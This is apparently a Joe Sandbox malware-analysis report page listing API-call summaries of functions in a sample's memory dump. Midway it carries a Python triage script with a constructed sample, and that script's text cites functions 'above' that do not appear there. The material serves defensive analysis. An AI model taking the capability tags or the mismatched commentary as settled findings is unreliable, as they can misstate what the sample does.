                                           • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                          • String ID: 0
                                          • API String ID: 3616455698-4108050209
                                          • Opcode ID: 6bec600c834df8dc96d5a5bdbea63822ce955063e09063b469a3fbe2caf8b0dc
                                          • Instruction ID: 1f4b26748acbd306f80436c739abe2149612f13bc667d1615891cc6996f1685b
                                          • Opcode Fuzzy Hash: 6bec600c834df8dc96d5a5bdbea63822ce955063e09063b469a3fbe2caf8b0dc
                                          • Instruction Fuzzy Hash: 96819F702083019FD714CF25C894A6BBBE4FB8875AF20592EFD95A7291D770D909CFA2
                                          APIs
                                            • Part of subcall function 00E2874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E28766
                                            • Part of subcall function 00E2874A: GetLastError.KERNEL32(?,00E2822A,?,?,?), ref: 00E28770
                                            • Part of subcall function 00E2874A: GetProcessHeap.KERNEL32(00000008,?,?,00E2822A,?,?,?), ref: 00E2877F
                                            • Part of subcall function 00E2874A: RtlAllocateHeap.NTDLL(00000000,?,00E2822A), ref: 00E28786
                                            • Part of subcall function 00E2874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E2879D
                                            • Part of subcall function 00E287E7: GetProcessHeap.KERNEL32(00000008,00E28240,00000000,00000000,?,00E28240,?), ref: 00E287F3
                                            • Part of subcall function 00E287E7: RtlAllocateHeap.NTDLL(00000000,?,00E28240), ref: 00E287FA
                                            • Part of subcall function 00E287E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E28240,?), ref: 00E2880B
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E2825B
                                          • _memset.LIBCMT ref: 00E28270
                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E2828F
                                          • GetLengthSid.ADVAPI32(?), ref: 00E282A0
                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00E282DD
                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E282F9
                                          • GetLengthSid.ADVAPI32(?), ref: 00E28316
                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E28325
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00E2832C
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E2834D
                                          • CopySid.ADVAPI32(00000000), ref: 00E28354
                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E28385
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E283AB
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E283BF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                          • String ID:
                                          • API String ID: 2347767575-0
                                          • Opcode ID: 1fc6e8330d2b53dab778e41915356020e07b29e4982cb5c411117b4303b42287
                                          • Instruction ID: 5abbfe10bf6f9df524b6386e7a259a4c940fc04ef280a9ad9bbde9471e76cf32
                                          • Opcode Fuzzy Hash: 1fc6e8330d2b53dab778e41915356020e07b29e4982cb5c411117b4303b42287
                                          • Instruction Fuzzy Hash: CA616771901219EFCF04DFA1EE84AEEBBB9FF04705F089529E815B7291DB309A05CB60
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                          • API String ID: 0-4052911093
                                          • Opcode ID: 39294c78fd5f53737c2c285a49cd3bfd59c869d563960668fcce507da856417a
                                          • Instruction ID: 762547661662dce4a79470bc6ee5f1d124b970e17f2edf1bcf1edf9e5424224e
                                          • Opcode Fuzzy Hash: 39294c78fd5f53737c2c285a49cd3bfd59c869d563960668fcce507da856417a
                                          • Instruction Fuzzy Hash: 44728471E002699BDB14DF59D8807ADB7B5FF94350F1491AAE849FB280D770DE81CBA0
                                          APIs
                                            • Part of subcall function 00E510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E50038,?,?), ref: 00E510BC
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E50737
                                            • Part of subcall function 00DD9997: __itow.LIBCMT ref: 00DD99C2
                                            • Part of subcall function 00DD9997: __swprintf.LIBCMT ref: 00DD9A0C
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E507D6
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E5086E
                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00E50AAD
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00E50ABA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                          • String ID:
                                          • API String ID: 1240663315-0
                                          • Opcode ID: 33a13c2c759d84829fc90fae5fe8e01053b7e19d2ac8bbefa8fb103ef503630a
                                          • Instruction ID: b200794a801b2c18aa777eaba81edde9f9fc98e6a0417107f369f061ed0b0372
                                          • Opcode Fuzzy Hash: 33a13c2c759d84829fc90fae5fe8e01053b7e19d2ac8bbefa8fb103ef503630a
                                          • Instruction Fuzzy Hash: 0AE13071204310AFCB14DF25C895E6ABBE4EF89714F04996DF84AE72A2DB31ED05CB61
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00E30241
                                          • GetAsyncKeyState.USER32(000000A0), ref: 00E302C2
                                          • GetKeyState.USER32(000000A0), ref: 00E302DD
                                          • GetAsyncKeyState.USER32(000000A1), ref: 00E302F7
                                          • GetKeyState.USER32(000000A1), ref: 00E3030C
                                          • GetAsyncKeyState.USER32(00000011), ref: 00E30324
                                          • GetKeyState.USER32(00000011), ref: 00E30336
                                          • GetAsyncKeyState.USER32(00000012), ref: 00E3034E
                                          • GetKeyState.USER32(00000012), ref: 00E30360
                                          • GetAsyncKeyState.USER32(0000005B), ref: 00E30378
                                          • GetKeyState.USER32(0000005B), ref: 00E3038A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: d5341b1b58f9ec8294c7c8759d5a7d4586d5b32f7f15559784a2633e95cb0b0b
                                          • Instruction ID: 6674fc3b8c82654ab11a4d961ccc934c2e30729ee3ebc6325785f4f40d40e9e3
                                          • Opcode Fuzzy Hash: d5341b1b58f9ec8294c7c8759d5a7d4586d5b32f7f15559784a2633e95cb0b0b
                                          • Instruction Fuzzy Hash: D341A5245047C96FFF359A64882C3A6BFA06F12348F08549DD5C6671C3EB945DC8C7A2
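The function summaries above (the RegCreateKeyExW/RegSetValueExW registry writer, the FindFirstFileW/SetCurrentDirectoryW directory walk, the GetUserObjectSecurity/AddAce DACL editor, the GetAsyncKeyState/GetKeyState modifier probe) share one fixed layout, which makes them easy to triage mechanically. The Python below is an added example and is not part of the Joe Sandbox report or its IDA plugin: it parses blocks in this layout, keeps direct calls apart from "Part of subcall function" entries so a wrapper is not credited with its helpers' behaviour, decodes the virtual-key arguments, and tags each function with capability rules that are this example's own assumptions. The sample text is constructed from abbreviated copies of two blocks on this page.

```python
"""Parse Joe Sandbox IDA-plugin function summaries and tag capabilities.
Added example for this report page, not Joe Sandbox code. The block layout
follows the page; CAPABILITY_RULES and VK_NAMES are this example's own choices.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# One API line: optional "Part of subcall function <addr>:" prefix, then Name.MODULE(args), ref: addr
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")  # "API ID: ...", "String ID: ..."

# Win32 virtual-key constants that appear as GetAsyncKeyState/GetKeyState arguments on this page.
VK_NAMES = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}

# Assumed rules: a tag fires only when every listed API is a direct call of the function.
CAPABILITY_RULES = {
    "keystroke state polling": {"GetAsyncKeyState", "GetKeyState"},
    "registry value write": {"RegCreateKeyEx", "RegSetValueEx"},
    "recursive directory enumeration": {"FindFirstFile", "FindNextFile", "SetCurrentDirectory"},
    "user-object DACL modification": {"GetUserObjectSecurity", "AddAce", "SetUserObjectSecurity"},
}


def canonical(api: str) -> str:
    """Drop the ANSI/Unicode suffix (RegSetValueExW -> RegSetValueEx); leave names like ..._W alone."""
    if len(api) > 2 and api[-1] in "AW" and api[-2].islower():
        return api[:-1]
    return api


def parse_arg(tok: str):
    """'?' is an unknown value, hex (possibly negative) becomes int, anything else stays a literal."""
    tok = tok.strip()
    if tok == "?":
        return None
    try:
        return int(tok, 16)
    except ValueError:
        return tok


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None  # callee address when the call is reported via a subcall


@dataclass
class FunctionSummary:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)

    def direct_apis(self) -> set:
        return {canonical(c.api) for c in self.calls if c.subcall_of is None}

    def capabilities(self) -> list:
        apis = self.direct_apis()
        return [name for name, need in CAPABILITY_RULES.items() if need <= apis]

    def polled_keys(self) -> list:
        """Names of the virtual keys probed through GetAsyncKeyState/GetKeyState."""
        keys = set()
        for c in self.calls:
            if canonical(c.api) in ("GetAsyncKeyState", "GetKeyState") and c.args and isinstance(c.args[0], int):
                keys.add(VK_NAMES.get(c.args[0], f"VK_{c.args[0]:02X}"))
        return sorted(keys)


def parse_report(text: str) -> list:
    """Split report text into per-function summaries; a block closes at its Instruction Fuzzy Hash line."""
    blocks, cur = [], FunctionSummary()
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if m:
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["api"], m["mod"], args, m["ref"] or "", m["sub"]))
            continue
        f = FIELD_RE.match(line)
        if f:
            cur.meta[f["key"]] = f["val"]
            if f["key"] == "Instruction Fuzzy Hash":
                blocks.append(cur)
                cur = FunctionSummary()
    if cur.calls or cur.meta:
        blocks.append(cur)
    return blocks


# Constructed sample in the report's layout: two abbreviated function blocks from this page.
SAMPLE = """\
APIs
• GetKeyboardState.USER32(?), ref: 00E30241
• GetAsyncKeyState.USER32(000000A0), ref: 00E302C2
• GetKeyState.USER32(000000A0), ref: 00E302DD
• GetAsyncKeyState.USER32(00000011), ref: 00E30324
Similarity
• API ID: State$Async$Keyboard
• Instruction Fuzzy Hash: D341A5245047C96FFF359A64882C3A6BFA06F12348F08549DD5C6671C3EB945DC8C7A2
APIs
  • Part of subcall function 00E510A5: CharUpperBuffW.USER32(?,?), ref: 00E510BC
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E50BDE
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00E5F910,00000000,?,00000000,?,?), ref: 00E50C4C
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00E50D1D
• RegCloseKey.ADVAPI32(00000000), ref: 00E5104A
Similarity
• String ID: REG_BINARY$REG_DWORD$REG_SZ
• Instruction Fuzzy Hash: D0026F752006119FCB14EF24C895E2AB7E5FF88714F05985DF889AB3A2CB31ED45CBA1
"""
```

The tags describe what a runtime routine is able to do, not what the embedded script asks of it: the keystroke routine here probes only modifier keys (left/right Shift, Ctrl, Alt, left Win), which is consistent with a scripting runtime's own input handling (the same binary carries AutoIt GUI macros such as @GUI_DRAGFILE), so a "keystroke state polling" tag is a triage cue to be confirmed against the behaviour sections, not a keylogger verdict on its own.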
                                          APIs
                                            • Part of subcall function 00DD9997: __itow.LIBCMT ref: 00DD99C2
                                            • Part of subcall function 00DD9997: __swprintf.LIBCMT ref: 00DD9A0C
                                          • CoInitialize.OLE32 ref: 00E48718
                                          • CoUninitialize.COMBASE ref: 00E48723
                                          • CoCreateInstance.COMBASE(?,00000000,00000017,00E62BEC,?), ref: 00E48783
                                          • IIDFromString.COMBASE(?,?), ref: 00E487F6
                                          • VariantInit.OLEAUT32(?), ref: 00E48890
                                          • VariantClear.OLEAUT32(?), ref: 00E488F1
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                          • API String ID: 834269672-1287834457
                                          • Opcode ID: ccecaeca296daafd76316187769902dd70c652bee2adba3200f4d481328c18d4
                                          • Instruction ID: 5dc75272b9b36faabbf9e68023fdcda6429751511b5065e038e95dc1fa860d64
                                          • Opcode Fuzzy Hash: ccecaeca296daafd76316187769902dd70c652bee2adba3200f4d481328c18d4
                                          • Instruction Fuzzy Hash: DA61B0706083019FD714DF24EA58B6EBBE4EF48714F54581EF985AB291CB70ED48CBA2
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                          • String ID:
                                          • API String ID: 1737998785-0
                                          • Opcode ID: 848dea906c2dc673349e3907464f6d21fdd0a3f6a0869a6b1d0d24bad3e0d5ea
                                          • Instruction ID: 4fa6f2aeea6e0036f4fe64d3a0a98c98c91d0b3208a7304c353876ab385c6054
                                          • Opcode Fuzzy Hash: 848dea906c2dc673349e3907464f6d21fdd0a3f6a0869a6b1d0d24bad3e0d5ea
                                          • Instruction Fuzzy Hash: D921A375300220AFDB14AF21EC19F6A77A8EF04715F109416F906EB2B1CB75AC00CBA4
                                          APIs
                                            • Part of subcall function 00DD48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DD48A1,?,?,00DD37C0,?), ref: 00DD48CE
                                            • Part of subcall function 00E34CD3: GetFileAttributesW.KERNEL32(?,00E33947), ref: 00E34CD4
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00E33ADF
                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00E33B87
                                          • MoveFileW.KERNEL32(?,?), ref: 00E33B9A
                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00E33BB7
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E33BD9
                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00E33BF5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                          • String ID: \*.*
                                          • API String ID: 4002782344-1173974218
                                          • Opcode ID: f80052073e51c053f75b222d1f365945691145110bacee5e8b3981a9722e629c
                                          • Instruction ID: cb73a9f8ceee0ab1c973e3bd6f5be4edb172e7f1b3e55ca64855bc5333329b9a
                                          • Opcode Fuzzy Hash: f80052073e51c053f75b222d1f365945691145110bacee5e8b3981a9722e629c
                                          • Instruction Fuzzy Hash: 65518F31805249AACF15EBA0DD96DEDBBB8AF14304F2451AAE44277191EF306F0DCBB0
                                          APIs
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00E3F6AB
                                          • Sleep.KERNEL32(0000000A), ref: 00E3F6DB
                                          • _wcscmp.LIBCMT ref: 00E3F6EF
                                          • _wcscmp.LIBCMT ref: 00E3F70A
                                          • FindNextFileW.KERNEL32(?,?), ref: 00E3F7A8
                                          • FindClose.KERNEL32(00000000), ref: 00E3F7BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                          • String ID: *.*
                                          • API String ID: 713712311-438819550
                                          • Opcode ID: 55708d40211561f1a599f378cbb947634180bb793e619489ad8653705eaecf96
                                          • Instruction ID: d7ff2b37de8c6cc0594454b17d25606f5a9d21cb58f892c55454c3c244cab068
                                          • Opcode Fuzzy Hash: 55708d40211561f1a599f378cbb947634180bb793e619489ad8653705eaecf96
                                          • Instruction Fuzzy Hash: 24415D71D1021A9FDF15EF64CC89AEEBBB4FF05314F145566E815B22A1EB309E44CBA0
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • GetSystemMetrics.USER32(0000000F), ref: 00E5D78A
                                          • GetSystemMetrics.USER32(0000000F), ref: 00E5D7AA
                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00E5D9E5
                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E5DA03
                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E5DA24
                                          • ShowWindow.USER32(00000003,00000000), ref: 00E5DA43
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00E5DA68
                                          • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00E5DA8B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                                          • String ID:
                                          • API String ID: 830902736-0
                                          • Opcode ID: ccc8deebdcca9cf9ea3e74ad20fc927231a63ece03b5f209d036ec0757e14a06
                                          • Instruction ID: 88989591dc04713ef09f175ae81abb50162add32753b2a8bccba6b260a48675e
                                          • Opcode Fuzzy Hash: ccc8deebdcca9cf9ea3e74ad20fc927231a63ece03b5f209d036ec0757e14a06
                                          • Instruction Fuzzy Hash: 65B1DC31504215EFCF28CF69C9857BE7BB1FF48706F08946AEC48AB295D730A958CB90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                          • API String ID: 0-1546025612
                                          • Opcode ID: c973e2d80c6e29bb6c55afc5e5686f22fec4e2eae49f92c84042f46b804946f3
                                          • Instruction ID: e842d9f3af995e2948c7d5e0de59547e89e24be5c0ff1fc81f963308b4ef6b26
                                          • Opcode Fuzzy Hash: c973e2d80c6e29bb6c55afc5e5686f22fec4e2eae49f92c84042f46b804946f3
                                          • Instruction Fuzzy Hash: 42A28F70E0425A8BDF24EF59C9907EEB7B1BF55714F2481A9D896A7280D7309EC1CBA0
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E2EB19
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
